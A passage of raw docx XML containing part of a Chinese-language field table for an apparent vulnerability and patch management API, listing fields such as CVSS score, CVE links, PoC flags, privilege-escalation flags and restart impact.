            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="18A10C0A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>2048)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75579433" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>补丁修复命令（仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2DF77B39" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38D3B693" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>remedDesc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2D0FF4AE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="582A716E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F4E67F8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>修复描述（仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1E7AE04B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A3F035D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>installPackage</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E70CF78" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="38D3E96A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34AE518A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>安装包地址（仅windows）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7B5BE33C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AFB69D2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cvssScore</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A178F8E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04EB1494" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>float</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="49812B03" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Cvss</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>分</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="14BE779A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F296A23" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cvssDetail</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42D98593" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DE62F78" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>64)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="72B7EAFA" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Cvss</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>详情</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5B125035" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69FF0F4E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>ref</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78FB24A9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55BA54DD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>mediumblob</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68568AA8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Cve</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>链接</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6378C555" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="689BE0C9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>restartOpts</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F0B6F90" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34C3BA69" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53D3127A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>修复影响:0-未知;1-不需要重启;2-服务重启;3-系统重启</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="05975A88" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B37471D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hasExp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02AFF955" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33FCE488" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="07D80729" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否存在exp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="01EBE0FF" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A78D472" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>isKernel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="287AE65E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DE46C88" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F2462B8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>内核漏洞（仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="713C2F82" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51235A4C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>isLocalEscalation</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="544BF046" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="004D9609" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B817A43" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>本地提权（仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3B887A0B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CF78E48" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>isRemote</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="301A23F8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75E2A354" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12A0BD3D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>远程执行（仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="161C2A09" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DBECA44" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>hasPoc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B627D7A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C748504" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D1FC02D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>存在</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>poc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>（仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="10EBE68B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51854AC6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pocRefs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01926DEB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="698F77A2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FED6296" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Poc</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>参考链接（仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7408D76C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="44F81200" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>impacts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BD769FB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1209B62D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="199E96B8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>补丁特征（仅windows）：1-纵深防御；2-拒绝服务；3-权限提升；4-信息泄露；5-远程代码执行；6-安全特征绕过；7-电子欺骗；8-数据篡改</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1C8AE244" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="123D4E7C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>firstCheckTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54F8B573" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6455E4C7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E3684A1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>第一次被检测出该补丁的时间(仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="19CB14B5" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17171303" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>businessImpact</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B41186E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B531299" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7CFD3AF0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t xml:space="preserve">是否存在进程影响 0/1 </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>无进程</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>影响/有进程影响(仅</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>linux</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>, 并且当前进程影响没有未知状态, 当主机没有进行进程影响扫描的时候, 都是</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>无进程</w:t>
